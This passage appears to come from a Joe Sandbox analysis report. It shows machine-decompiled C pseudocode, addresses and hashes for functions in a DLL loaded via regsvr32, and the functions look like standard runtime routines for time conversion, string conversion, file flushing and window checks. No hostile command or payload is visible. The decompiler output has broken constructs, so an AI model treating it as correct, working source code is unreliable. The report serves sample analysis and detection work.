					 *((intOrPtr*)(__rcx + 0x18)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 0x1c)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 0x20)) = 0xffffffff;
					if(__rdx == 0) {
						goto L1;
					} else {
						_t151 =  *__rdx;
						if(_t151 >= 0) {
							_t182 = 0x93406fff;
							if (_t151 - 0x93406fff > 0) goto L1;
							E10045B70();
							if(E10044CD0(__ebx, __esp, _t151,  &_v36, __rsi) != 0) {
								r9d = 0;
								r8d = 0;
								_t134 = 0;
								_t128 = 0;
								_v56 = __rsi;
								E1003C6F0(0, __rdx, __r8);
							}
							if(E10044D20(_t151, _t178,  &_v32, _t200, _t217, _t221, _t225, _t226) != 0) {
								r9d = 0;
								r8d = 0;
								_t134 = 0;
								_t128 = 0;
								_v56 = _t221;
								E1003C6F0(0, _t200, _t226);
							}
							if(E10044D70(_t151, _t178,  &_v40, _t200, _t217, _t221, _t225, _t226) != 0) {
								r9d = 0;
								r8d = 0;
								_t134 = 0;
								_t128 = 0;
								_v56 = _t221;
								E1003C6F0(0, _t200, _t226);
							}
							_t186 =  *_t217;
							if(_t186 <= 0x3f480) {
								_t201 = _t217;
								_t105 = E10044990(_t134, _t148, _t151, _t178, _t178, _t201, _t217, _t221, _t225);
								if(_t105 == 0) {
									if(_v36 == 0) {
										L21:
										_t189 =  *_t178 - _v40;
									} else {
										_t105 = E10045BD0(_t178);
										if(_t105 == 0) {
											goto L21;
										} else {
											_t128 = _v32;
											_t178[8] = 1;
											_t105 = _t151;
											_t189 =  *_t178 - _t151;
										}
									}
									_t106 = _t105 * _t189;
									_t205 = ((_t201 + _t189 >> 5) + (_t201 + _t189 >> 5 >> 0x3f)) * 0x3c;
									 *_t178 = _t106;
									if(_t106 < 0) {
										_t106 = _t106 + 0x3c;
										_t189 = _t189 - 0x3c;
										 *_t178 = _t106;
									}
									_t238 = (_t189 + _t205 >> 5) + (_t189 + _t205 >> 5 >> 0x3f) + _t178[1];
									_t108 = _t106 * _t189 * _t238;
									_t209 = ((_t205 + _t238 >> 5) + (_t205 + _t238 >> 5 >> 0x3f)) * 0x3c;
									_t178[1] = _t128;
									if(_t128 < 0) {
										_t238 = _t238 - 0x3c;
										_t178[1] = _t128 + 0x3c;
									}
									_t231 = (_t238 + _t209 >> 5) + (_t238 + _t209 >> 5 >> 0x3f) + _t178[2];
									_t140 = _t108 * _t238 * _t231 >> 0x20;
									_t213 = _t231 - ((_t209 >> 2) + (_t209 >> 2 >> 0x3f) + ((_t209 >> 2) + (_t209 >> 2 >> 0x3f)) * 2 << 3);
									_t178[2] = _t140;
									if(_t140 < 0) {
										_t231 = _t231 - 0x18;
										_t178[2] = _t213 + 0x18;
									}
									_t233 = _t213 >> 2;
									_t174 = _t233 >> 0x3f;
									_t234 = _t233 + _t174;
									if(_t234 < 0) {
										_t178[3] = _t178[3] + r8d;
										_t130 = _t234 + _t174 + 7;
										_t117 = _t178[3];
										_t178[6] = _t234 + _t174 + 7 - (((0x92492493 * (_t234 + _t174 + 7) >> 0x20) + _t130 >> 2) + ((0x92492493 * (_t234 + _t174 + 7) >> 0x20) + _t130 >> 2 >> 0x1f)) * 7;
										if(_t117 > 0) {
											_t178[7] = _t178[7] + r8d;
										} else {
											_t178[5] = _t178[5] + 0xffffffff;
											_t178[7] = 0x16c;
											_t178[3] = _t117 + 0x1f;
											_t178[4] = 0xb;
										}
									}
									goto L32;
								}
							} else {
								_v24 = _t186 - _v40;
								_t105 = E10044990(_t134, _t148, _v40, _t178, _t178,  &_v24, _t217, _t221, _t225);
								if(_t105 == 0) {
									if(_v36 == 0 || E10045BD0(_t178) == 0) {
										L32:
										_t105 = 0;
									} else {
										_v24 = _v24 - _v32;
										_t105 = E10044990(_t134, _t148, _v32, _t178, _t178,  &_v24, _t217, _t221, _t225);
										if(_t105 == 0) {
											_t178[8] = 1;
											goto L32;
										}
									}
								}
							}
							return _t105;
						} else {
							E1003AF40(_t151);
							 *_t151 = 0x16;
							return 0x16;
						}
					}
				} else {
					L1:
					E1003AF40(_t151);
					r9d = 0;
					r8d = 0;
					_v56 = _t221;
					 *_t151 = 0x16;
					E1003C790(_t178, _t182, _t200, _t217, _t221, _t225, _t226);
					return 0x16;
				}
			}































                                                                              0x1003c090
                                                                              0x1003c090
                                                                              0x1003c090
                                                                              0x1003c090
                                                                              0x1003c090
                                                                              0x1003c090
                                                                              0x1003c090
                                                                              0x1003c094
                                                                              0x1003c099
                                                                              0x1003c0a3
                                                                              0x1003c0a8
                                                                              0x1003c0ab
                                                                              0x1003c0af
                                                                              0x1003c0b3
                                                                              0x1003c0b7
                                                                              0x1003c0ba
                                                                              0x1003c0f7
                                                                              0x1003c0fd
                                                                              0x1003c104
                                                                              0x1003c10b
                                                                              0x1003c112
                                                                              0x1003c119
                                                                              0x1003c120
                                                                              0x1003c127
                                                                              0x1003c12e
                                                                              0x1003c135
                                                                              0x00000000
                                                                              0x1003c137
                                                                              0x1003c137
                                                                              0x1003c13d
                                                                              0x1003c163
                                                                              0x1003c170
                                                                              0x1003c176
                                                                              0x1003c187
                                                                              0x1003c189
                                                                              0x1003c18c
                                                                              0x1003c18f
                                                                              0x1003c191
                                                                              0x1003c193
                                                                              0x1003c198
                                                                              0x1003c198
                                                                              0x1003c1a9
                                                                              0x1003c1ab
                                                                              0x1003c1ae
                                                                              0x1003c1b1
                                                                              0x1003c1b3
                                                                              0x1003c1b5
                                                                              0x1003c1ba
                                                                              0x1003c1ba
                                                                              0x1003c1cb
                                                                              0x1003c1cd
                                                                              0x1003c1d0
                                                                              0x1003c1d3
                                                                              0x1003c1d5
                                                                              0x1003c1d7
                                                                              0x1003c1dc
                                                                              0x1003c1dc
                                                                              0x1003c1e1
                                                                              0x1003c1eb
                                                                              0x1003c254
                                                                              0x1003c25a
                                                                              0x1003c261
                                                                              0x1003c26b
                                                                              0x1003c294
                                                                              0x1003c29c
                                                                              0x1003c26d
                                                                              0x1003c270
                                                                              0x1003c277
                                                                              0x00000000
                                                                              0x1003c279
                                                                              0x1003c279
                                                                              0x1003c281
                                                                              0x1003c28d
                                                                              0x1003c28f
                                                                              0x1003c28f
                                                                              0x1003c277
                                                                              0x1003c2ac
                                                                              0x1003c2c3
                                                                              0x1003c2cc
                                                                              0x1003c2ce
                                                                              0x1003c2d0
                                                                              0x1003c2d3
                                                                              0x1003c2d7
                                                                              0x1003c2d7
                                                                              0x1003c2f5
                                                                              0x1003c2fe
                                                                              0x1003c312
                                                                              0x1003c31b
                                                                              0x1003c31e
                                                                              0x1003c323
                                                                              0x1003c327
                                                                              0x1003c327
                                                                              0x1003c350
                                                                              0x1003c356
                                                                              0x1003c372
                                                                              0x1003c377
                                                                              0x1003c37a
                                                                              0x1003c37f
                                                                              0x1003c383
                                                                              0x1003c383
                                                                              0x1003c38f
                                                                              0x1003c396
                                                                              0x1003c39a
                                                                              0x1003c39d
                                                                              0x1003c3a2
                                                                              0x1003c3a6
                                                                              0x1003c3be
                                                                              0x1003c3c8
                                                                              0x1003c3cb
                                                                              0x1003c3e7
                                                                              0x1003c3cd
                                                                              0x1003c3d0
                                                                              0x1003c3d4
                                                                              0x1003c3db
                                                                              0x1003c3de
                                                                              0x1003c3de
                                                                              0x1003c3cb
                                                                              0x00000000
                                                                              0x1003c39d
                                                                              0x1003c1ed
                                                                              0x1003c1fa
                                                                              0x1003c202
                                                                              0x1003c209
                                                                              0x1003c213
                                                                              0x1003c3eb
                                                                              0x1003c3eb
                                                                              0x1003c229
                                                                              0x1003c236
                                                                              0x1003c23b
                                                                              0x1003c242
                                                                              0x1003c248
                                                                              0x00000000
                                                                              0x1003c248
                                                                              0x1003c242
                                                                              0x1003c213
                                                                              0x1003c209
                                                                              0x1003c400
                                                                              0x1003c13f
                                                                              0x1003c13f
                                                                              0x1003c144
                                                                              0x1003c162
                                                                              0x1003c162
                                                                              0x1003c13d
                                                                              0x1003c0bc
                                                                              0x1003c0bc
                                                                              0x1003c0bc
                                                                              0x1003c0c1
                                                                              0x1003c0c4
                                                                              0x1003c0cb
                                                                              0x1003c0d0
                                                                              0x1003c0d6
                                                                              0x1003c0f3
                                                                              0x1003c0f3

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8ee2c65c733c9990d6cc2ea8ede06c5c9e51bafe311a5d3179645edfe4fc24c3
                                                                              • Instruction ID: d31f45875533b8045037906a92e0210e37fd9705e3e877b19357ee781291bd2c
                                                                              • Opcode Fuzzy Hash: 8ee2c65c733c9990d6cc2ea8ede06c5c9e51bafe311a5d3179645edfe4fc24c3
                                                                              • Instruction Fuzzy Hash: 018119B37147898BDB14CF7AE44161A77A1E784B94F149226FB59CFB98EB38D102CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004AC80 Relevance: 3.2, APIs: 2, Instructions: 174COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 73%
                                                                              			E1004AC80(intOrPtr __esi, long long __rbx, int* __rcx, signed int __rdx, long long __rdi, long long __rsi, long long __rbp, signed int __r8, long long __r12, long long __r13, long long __r14, char _a16, signed short _a32, signed int _a40) {
				long long _v8;
				long long _v16;
				void* _v24;
				void* _v32;
				void* _v40;
				void* _v48;
				long long _v56;
				signed int _v64;
				long long _v72;
				void* _v88;
				long long _v96;
				long long _v104;
				intOrPtr _v112;
				long long _v120;
				void* _t58;
				int _t59;
				long _t60;
				intOrPtr _t63;
				signed int _t72;
				intOrPtr _t73;
				signed int _t75;
				signed int _t76;
				intOrPtr _t83;
				intOrPtr* _t89;
				intOrPtr* _t91;
				long long _t92;
				long long _t93;
				int* _t100;
				signed int _t103;
				long long _t105;
				intOrPtr* _t107;
				signed int _t108;
				long long _t111;
				signed int _t114;
				long long _t116;
				intOrPtr* _t117;

				_t116 = __r14;
				_t111 = __r12;
				_t108 = __r8;
				_t105 = __rbp;
				_t98 = __rdx;
				_t95 = __rcx;
				_t92 = __rbx;
				_t83 = __esi;
				_a32 = r9w;
				_t89 = _t107;
				 *((long long*)(_t89 - 0x18)) = __rsi;
				 *((long long*)(_t89 - 0x20)) = __rdi;
				 *((long long*)(_t89 - 0x28)) = __r12;
				 *((long long*)(_t89 - 0x30)) = __r13;
				_t103 = __r8;
				_t114 = __rdx;
				_t100 = __rcx;
				if(__rdx != 0 || __r8 == 0) {
					__eflags = _t95;
					if(_t95 != 0) {
						 *_t95 = 0xffffffff;
					}
					__eflags = _t108 - 0x7fffffff;
					if(_t108 <= 0x7fffffff) {
						_t96 = _a40;
						_v8 = _t92;
						_v16 = _t105;
						bpl = 0;
						__eflags = _t96;
						_v56 = _t116;
						_v64 = bpl;
						if(_t96 != 0) {
							_t98 =  &_v88;
							 *_t98 =  *_t96;
							_t89 =  *((intOrPtr*)(_t96 + 8));
							 *((long long*)(_t98 + 8)) = _t89;
							_t93 = _v72;
							_t117 = _v88;
						} else {
							_t58 = E1003D060(_t89, _t92, _t96, _t98, _t100, _t103, _t105, _t108, _t111);
							_t93 = _t89;
							_t117 =  *((intOrPtr*)(_t89 + 0xc0));
							_t111 =  *((intOrPtr*)(_t89 + 0xb8));
							__eflags = _t117 -  *0x100703d0; // 0x10070270
							if(__eflags != 0) {
								_t76 =  *(_t89 + 0xc8);
								__eflags =  *0x10070258 & _t76;
								if(( *0x10070258 & _t76) == 0) {
									_t58 = E10047EE0(_t76, _t89, _t96, _t98, _t108, _t111);
									_t117 = _t89;
								}
							}
							__eflags = _t111 -  *0x10070150; // 0x23a5c20
							if(__eflags != 0) {
								_t75 =  *(_t93 + 0xc8);
								__eflags =  *0x10070258 & _t75;
								if(( *0x10070258 & _t75) == 0) {
									_t58 = E10047300(_t75, _t89, _t93, _t96, _t98, _t100, _t103, _t105, _t111);
								}
							}
							_t72 =  *(_t93 + 0xc8);
							__eflags = _t72 & 0x00000002;
							if((_t72 & 0x00000002) != 0) {
								r9w = _a32;
							} else {
								_t72 = _t72 | 0x00000002;
								bpl = 1;
								 *(_t93 + 0xc8) = _t72;
								r9d = _a32 & 0x0000ffff;
							}
						}
						__eflags =  *(_t117 + 0x14);
						if( *(_t117 + 0x14) != 0) {
							_t73 =  *((intOrPtr*)(_t117 + 4));
							r12d = 0;
							_t91 =  &_a16;
							_v96 = _t91;
							_v104 = _t111;
							_t109 =  &_a32;
							_t39 = _t111 + 1; // 0x1
							r9d = _t39;
							_v112 = _t83;
							_v120 = _t114;
							_a16 = r12d;
							_t59 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
							__eflags = _t59;
							if(_t59 == 0) {
								_t60 = GetLastError();
								__eflags = _t60 - 0x7a;
								if(_t60 != 0x7a) {
									L39:
									E1003AF40(_t91);
									 *_t91 = 0x2a;
									E1003AF40(_t91);
									__eflags = bpl;
									_t63 =  *_t91;
									goto L40;
								}
								__eflags = _t114;
								if(_t114 != 0) {
									__eflags = _t103;
									if(_t103 != 0) {
										_t109 = _t103;
										__eflags = 0;
										_t96 = _t114;
										E1003A240(_t60, _t73, 0, _t114, _t98, _t103);
									}
								}
								E1003AF40(_t91);
								 *_t91 = 0x22;
								r9d = 0;
								r8d = 0;
								_v120 = _t111;
								E1003C790(_t93, _t96, _t98, _t100, _t103, _t105, _t109);
								__eflags = bpl;
								if(bpl != 0) {
									_t47 = _t93 + 0xc8;
									 *_t47 =  *(_t93 + 0xc8) & 0xfffffffd;
									__eflags =  *_t47;
								}
								_t63 = 0x22;
								goto L42;
							}
							__eflags = _a16 - r12d;
							if(_a16 != r12d) {
								goto L39;
							}
							__eflags = _t100;
							if(_t100 != 0) {
								 *_t100 = _t59;
							}
							__eflags = bpl;
							if(bpl != 0) {
								_t44 = _t93 + 0xc8;
								 *_t44 =  *(_t93 + 0xc8) & 0xfffffffd;
								__eflags =  *_t44;
							}
							_t63 = 0;
							goto L42;
						} else {
							__eflags = r9w - 0xff;
							if (r9w - 0xff <= 0) goto 0x1004ae0f;
							__eflags = _t114;
							if(_t114 != 0) {
								__eflags = _t103;
								if(_t103 != 0) {
									__eflags = 0;
									E1003A240(_t58, _t72, 0, _t114, _t98, _t103);
								}
							}
							E1003AF40(_t89);
							 *_t89 = 0x2a;
							E1003AF40(_t89);
							__eflags = bpl;
							_t63 =  *_t89;
							L40:
							if(__eflags != 0) {
								_t49 = _t93 + 0xc8;
								 *_t49 =  *(_t93 + 0xc8) & 0xfffffffd;
								__eflags =  *_t49;
							}
							L42:
							goto L43;
						}
					}
					E1003AF40(_t89);
					r12d = 0;
					r9d = 0;
					r8d = 0;
					 *_t89 = 0x16;
					_v120 = _t111;
					E1003C790(_t92, _t95, _t98, _t100, _t103, _t105, _t108);
					_t7 = _t111 + 0x16; // 0x16
					_t63 = _t7;
					goto L43;
				} else {
					if(__rcx != 0) {
						r12d = 0;
						 *((intOrPtr*)(__rcx)) = r12d;
					}
					_t63 = 0;
					L43:
					return _t63;
				}
			}







































                                                                              0x1004ac80
                                                                              0x1004ac80
                                                                              0x1004ac80
                                                                              0x1004ac80
                                                                              0x1004ac80
                                                                              0x1004ac80
                                                                              0x1004ac80
                                                                              0x1004ac80
                                                                              0x1004ac80
                                                                              0x1004ac86
                                                                              0x1004ac93
                                                                              0x1004ac97
                                                                              0x1004ac9b
                                                                              0x1004ac9f
                                                                              0x1004aca3
                                                                              0x1004aca6
                                                                              0x1004aca9
                                                                              0x1004acac
                                                                              0x1004acc5
                                                                              0x1004acc8
                                                                              0x1004acca
                                                                              0x1004acca
                                                                              0x1004acd0
                                                                              0x1004acd7
                                                                              0x1004ad05
                                                                              0x1004ad0d
                                                                              0x1004ad15
                                                                              0x1004ad1d
                                                                              0x1004ad20
                                                                              0x1004ad23
                                                                              0x1004ad28
                                                                              0x1004ad2d
                                                                              0x1004adb0
                                                                              0x1004adb5
                                                                              0x1004adb8
                                                                              0x1004adbc
                                                                              0x1004adc5
                                                                              0x1004adca
                                                                              0x1004ad2f
                                                                              0x1004ad2f
                                                                              0x1004ad34
                                                                              0x1004ad37
                                                                              0x1004ad3e
                                                                              0x1004ad45
                                                                              0x1004ad4c
                                                                              0x1004ad4e
                                                                              0x1004ad54
                                                                              0x1004ad5a
                                                                              0x1004ad5c
                                                                              0x1004ad61
                                                                              0x1004ad61
                                                                              0x1004ad5a
                                                                              0x1004ad64
                                                                              0x1004ad6b
                                                                              0x1004ad6d
                                                                              0x1004ad73
                                                                              0x1004ad79
                                                                              0x1004ad7b
                                                                              0x1004ad7b
                                                                              0x1004ad79
                                                                              0x1004ad80
                                                                              0x1004ad86
                                                                              0x1004ad89
                                                                              0x1004ada2
                                                                              0x1004ad8b
                                                                              0x1004ad8b
                                                                              0x1004ad8e
                                                                              0x1004ad91
                                                                              0x1004ad97
                                                                              0x1004ad97
                                                                              0x1004ad89
                                                                              0x1004adcf
                                                                              0x1004add4
                                                                              0x1004ae3d
                                                                              0x1004ae41
                                                                              0x1004ae44
                                                                              0x1004ae4c
                                                                              0x1004ae51
                                                                              0x1004ae56
                                                                              0x1004ae5e
                                                                              0x1004ae5e
                                                                              0x1004ae65
                                                                              0x1004ae69
                                                                              0x1004ae6e
                                                                              0x1004ae76
                                                                              0x1004ae7c
                                                                              0x1004ae7e
                                                                              0x1004aea1
                                                                              0x1004aea7
                                                                              0x1004aeaa
                                                                              0x1004aef5
                                                                              0x1004aef5
                                                                              0x1004aefa
                                                                              0x1004af00
                                                                              0x1004af05
                                                                              0x1004af08
                                                                              0x00000000
                                                                              0x1004af08
                                                                              0x1004aeac
                                                                              0x1004aeaf
                                                                              0x1004aeb1
                                                                              0x1004aeb4
                                                                              0x1004aeb6
                                                                              0x1004aeb9
                                                                              0x1004aebb
                                                                              0x1004aebe
                                                                              0x1004aebe
                                                                              0x1004aeb4
                                                                              0x1004aec3
                                                                              0x1004aec8
                                                                              0x1004aece
                                                                              0x1004aed1
                                                                              0x1004aed8
                                                                              0x1004aedd
                                                                              0x1004aee2
                                                                              0x1004aee5
                                                                              0x1004aee7
                                                                              0x1004aee7
                                                                              0x1004aee7
                                                                              0x1004aee7
                                                                              0x1004aeee
                                                                              0x00000000
                                                                              0x1004aeee
                                                                              0x1004ae80
                                                                              0x1004ae88
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004ae8a
                                                                              0x1004ae8d
                                                                              0x1004ae8f
                                                                              0x1004ae8f
                                                                              0x1004ae91
                                                                              0x1004ae94
                                                                              0x1004ae96
                                                                              0x1004ae96
                                                                              0x1004ae96
                                                                              0x1004ae96
                                                                              0x1004ae9d
                                                                              0x00000000
                                                                              0x1004add6
                                                                              0x1004add6
                                                                              0x1004addc
                                                                              0x1004adde
                                                                              0x1004ade1
                                                                              0x1004ade3
                                                                              0x1004ade6
                                                                              0x1004adeb
                                                                              0x1004adf0
                                                                              0x1004adf0
                                                                              0x1004ade6
                                                                              0x1004adf5
                                                                              0x1004adfa
                                                                              0x1004ae00
                                                                              0x1004ae05
                                                                              0x1004ae08
                                                                              0x1004af0a
                                                                              0x1004af0a
                                                                              0x1004af0c
                                                                              0x1004af0c
                                                                              0x1004af0c
                                                                              0x1004af0c
                                                                              0x1004af13
                                                                              0x00000000
                                                                              0x1004af23
                                                                              0x1004add4
                                                                              0x1004acd9
                                                                              0x1004acde
                                                                              0x1004ace1
                                                                              0x1004ace4
                                                                              0x1004aceb
                                                                              0x1004acf1
                                                                              0x1004acf6
                                                                              0x1004acfb
                                                                              0x1004acfb
                                                                              0x00000000
                                                                              0x1004acb3
                                                                              0x1004acb6
                                                                              0x1004acb8
                                                                              0x1004acbb
                                                                              0x1004acbb
                                                                              0x1004acbe
                                                                              0x1004af28
                                                                              0x1004af46
                                                                              0x1004af46

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharErrorLastMultiWide
                                                                              • String ID:
                                                                              • API String ID: 203985260-0
                                                                              • Opcode ID: 159a0be6eb8b64d2749e8e1f528e233ddb5d2766d4840ff896ea5d4324885c81
                                                                              • Instruction ID: fea892cbdb857acb58f5f8484fbda79f632f8cabd904199026e2f4d1fab62307
                                                                              • Opcode Fuzzy Hash: 159a0be6eb8b64d2749e8e1f528e233ddb5d2766d4840ff896ea5d4324885c81
                                                                              • Instruction Fuzzy Hash: 6A71C176A05B808AD7A1CF62E44075F73A4F78AB95F308135EF9987B48DB38C485CB18
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10050E30 Relevance: 3.1, APIs: 2, Instructions: 82COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 79%
                                                                              			E10050E30(void* __ebx, signed int __ecx, signed int __edi, long* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __rdi, long long __rsi, void* __rbp, void* __r8, long long __r12, void* __r13, signed int _a8, long long _a16, long long _a24, long long _a32) {
				long long _v8;
				signed long long _v40;
				void* _t25;
				long _t28;
				int _t32;
				long _t33;
				void* _t38;
				signed int _t51;
				long _t52;
				long* _t56;
				long* _t57;
				signed long long _t66;
				signed long long _t70;

				_t72 = __r8;
				_t71 = __rbp;
				_t67 = __rsi;
				_t64 = __rdi;
				_t63 = __rdx;
				_t61 = __rcx;
				_t55 = __rax;
				_t38 = __ebx;
				_a8 = __ecx;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_v8 = __r12;
				_t59 = __ecx;
				if(__ebx != 0xfffffffe) {
					__eflags = __ecx;
					if(__ecx < 0) {
						L13:
						E1003AF40(_t55);
						 *_t55 = 9;
						_v40 = _t64;
						r9d = 0;
						r8d = 0;
						__eflags = 0;
						E1003C790(_t59, _t61, _t63, _t64, _t67, _t71, _t72);
						_t20 = _t64 - 1; // -1
						_t28 = _t20;
					} else {
						__eflags = __ebx -  *0x10077288;
						if(__ebx >=  *0x10077288) {
							goto L13;
						} else {
							_t70 = __ecx >> 5;
							dil = __ebx;
							_t51 = __edi & 0x0000001f;
							_t66 = __rdi << 6;
							_t56 =  *((intOrPtr*)(0x100772a0 + _t70 * 8));
							__eflags =  *(_t56 + _t66 + 8) & 0x00000001;
							if(( *(_t56 + _t66 + 8) & 0x00000001) != 0) {
								E1004C9C0(_t25, __ebx, _t51, __ecx, _t66, _t70, 0x100772a0, __r13);
								_t57 =  *((intOrPtr*)(0x100772a0 + _t70 * 8));
								__eflags =  *(_t57 + _t66 + 8) & 0x00000001;
								if(( *(_t57 + _t66 + 8) & 0x00000001) == 0) {
									L11:
									E1003AF40(_t57);
									 *_t57 = 9;
									_t52 = 0xffffffff;
								} else {
									E1004C920(_t38, _t57, _t59, _t66, _t70, __rbp, __r8);
									_t32 = FlushFileBuffers(??);
									__eflags = _t32;
									if(_t32 != 0) {
										_t52 = 0;
									} else {
										_t33 = GetLastError();
										_t52 = _t33;
										__eflags = _t33;
										if(__eflags != 0) {
											E1003AF70(__eflags, _t57);
											 *_t57 = _t52;
											goto L11;
										}
									}
								}
								E1004CAA0();
								_t28 = _t52;
							} else {
								E1003AF40(_t56);
								 *_t56 = 9;
								_v40 = _t66;
								r9d = 0;
								r8d = 0;
								E1003C790(__ecx, __rcx, __rdx, _t66, _t70, __rbp, __r8);
								_t12 = _t66 - 1; // -1
								_t28 = _t12;
							}
						}
					}
				} else {
					E1003AF40(__rax);
					 *__rax = 9;
					_t28 = __ecx + 1;
				}
				return _t28;
			}
















                                                                              0x10050e30
                                                                              0x10050e30
                                                                              0x10050e30
                                                                              0x10050e30
                                                                              0x10050e30
                                                                              0x10050e30
                                                                              0x10050e30
                                                                              0x10050e30
                                                                              0x10050e30
                                                                              0x10050e38
                                                                              0x10050e3d
                                                                              0x10050e42
                                                                              0x10050e47
                                                                              0x10050e4c
                                                                              0x10050e52
                                                                              0x10050e67
                                                                              0x10050e69
                                                                              0x10050f21
                                                                              0x10050f21
                                                                              0x10050f26
                                                                              0x10050f2e
                                                                              0x10050f33
                                                                              0x10050f36
                                                                              0x10050f3b
                                                                              0x10050f3d
                                                                              0x10050f42
                                                                              0x10050f42
                                                                              0x10050e6f
                                                                              0x10050e6f
                                                                              0x10050e75
                                                                              0x00000000
                                                                              0x10050e7b
                                                                              0x10050e7e
                                                                              0x10050e89
                                                                              0x10050e8c
                                                                              0x10050e8f
                                                                              0x10050e93
                                                                              0x10050e9b
                                                                              0x10050e9e
                                                                              0x10050ec8
                                                                              0x10050ece
                                                                              0x10050ed2
                                                                              0x10050ed7
                                                                              0x10050f06
                                                                              0x10050f06
                                                                              0x10050f0b
                                                                              0x10050f11
                                                                              0x10050ed9
                                                                              0x10050edb
                                                                              0x10050ee3
                                                                              0x10050ee9
                                                                              0x10050eeb
                                                                              0x10050f02
                                                                              0x10050eed
                                                                              0x10050eed
                                                                              0x10050ef3
                                                                              0x10050ef5
                                                                              0x10050ef7
                                                                              0x10050ef9
                                                                              0x10050efe
                                                                              0x00000000
                                                                              0x10050efe
                                                                              0x10050ef7
                                                                              0x10050eeb
                                                                              0x10050f18
                                                                              0x10050f1d
                                                                              0x10050ea0
                                                                              0x10050ea0
                                                                              0x10050ea5
                                                                              0x10050ead
                                                                              0x10050eb2
                                                                              0x10050eb5
                                                                              0x10050ebc
                                                                              0x10050ec1
                                                                              0x10050ec1
                                                                              0x10050ec1
                                                                              0x10050e9e
                                                                              0x10050e75
                                                                              0x10050e54
                                                                              0x10050e54
                                                                              0x10050e59
                                                                              0x10050e5f
                                                                              0x10050e5f
                                                                              0x10050f5d

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 27b2a3875c4bbd6e2b2f9c6c9c7f28b6f2ac74da58a64b79ef87571749341073
                                                                              • Instruction ID: a433a9674a4bd8e31a73001522e0b6830e03f77b9e4c15a5d8c31c3981a2f08c
                                                                              • Opcode Fuzzy Hash: 27b2a3875c4bbd6e2b2f9c6c9c7f28b6f2ac74da58a64b79ef87571749341073
                                                                              • Instruction Fuzzy Hash: DB31CC36A04B848BD725DF62A841B0F73A5F785790F264138FE9947B9ACF78E844CB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001F2AC Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 72%
                                                                              			E1001F2AC(void* __edx, void* __rax, void* __rcx) {
				void* _t4;
				void* _t18;
				void* _t25;

				_t18 = __rax;
				_t9 = __edx;
				_t25 = __rcx;
				if(__edx == 0xffffffff) {
					if(IsWindowVisible() != 0) {
						IsIconic();
						_t9 =  !=  ? 9 : __edx;
					} else {
						_t2 = _t18 + 1; // 0x1
						_t9 = _t2;
					}
				}
				_t4 = E1001D2C8(_t9, _t18, _t25);
				if(_t9 == 0xffffffff) {
					return _t4;
				} else {
					E10016154(_t25);
					return E1001D2C8(_t9, _t18, _t25);
				}
			}






                                                                              0x1001f2ac
                                                                              0x1001f2b6
                                                                              0x1001f2b8
                                                                              0x1001f2bb
                                                                              0x1001f2c9
